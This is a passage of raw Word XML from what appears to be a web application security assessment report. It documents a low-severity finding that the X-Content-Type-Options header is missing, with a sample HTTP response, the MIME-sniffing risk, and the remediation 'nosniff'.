                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="17D52F83" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="688C8164" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 17:43:49 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="714CC880" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Last-Modified: Wed, 22 May 2019 13:37:09 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="29B4CD7D" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ETag</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: "18550-3f4-5897a0fe16b40"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="183BF8F9" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept-Ranges: bytes</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4FCB23A6" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 1012</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3F23842D" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: text/html</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="50928944" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="20A8C428" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0579ECD4" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="79DF427E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D072FB" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D80537" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="6FCF3184" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="054CD68A" w14:textId="0A237273" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="17" w:name="_Toc10703677"/>
            <w:r>
              <w:t>L4</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Missing Safeguard: Content</w:t>
            </w:r>
            <w:r w:rsidR="008B08E2">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>Type Options Header</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="17"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="47C07A0E" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAB766E"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EEB664E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId37" w:anchor="CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="003305F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.6</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0F146AF8" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3E173C02"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1C65F929" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-16: Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4E11B68C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D58741A"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="656AD246" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="003305F7" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1550F31F" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="18950103"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="27549600" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The application does not fully utilize Internet Explorer browser security controls to prevent MIME type confusion attacks. The tester observed that the application server does not serve responses with X-Content-Type-Options Header.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730B4388" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="122AA7D4" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>By default, Internet Explorer and some other browsers will attempt to automatically detect the MIME type of a HTTP response and override the Content-Type HTTP header provided in the response. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the intended content type. This behavior, called MIME sniffing, can be exploited to cause browsers to render content in an unintended manner with security implications. In a scenario where a website allows users to upload content which is then published on the web server, if an attacker can carry out XSS (Cross-site Scripting) attack by manipulating the content in a way to be accepted by the web application and rendered as HTML by the browser, it is possible to inject arbitrary code of the attacker&amp;#39</w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> choosing and make the victim execute that code with dangerous security and privacy implications.   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09752764" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">References: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E74E3B8" w14:textId="62D68096" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="008C11D3">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MSDN: Reducing MIME type security risks  (</w:t>
            </w:r>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidR="008C11D3" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://msdn.microsoft.com/en-us/library/ie/gg622941(v=vs.85).aspx</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="794FF01C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D8BA7AE"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AC999F" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prevent Internet Explorer version 9 and higher and other content-sniffing browsers from performing MIME sniffing. Issue the following HTTP response header in all application responses:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658E59AD" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Content-Type-Options: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nosniff</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211337C9" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Adding the X-Content-Type-Options header with a value of &amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>quot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nosniff</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;quot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; will inform the browser to trust what the site has sent in the response as content-type is the appropriate content-type, and to not attempt &amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>quot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sniffing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;quot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; the real content-type. Note that when MIME sniffing is disabled, the application must issue the correct Content-Type header for each resource to ensure proper functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="54AD34C2" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0ABB5710"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lastRenderedPageBreak/>
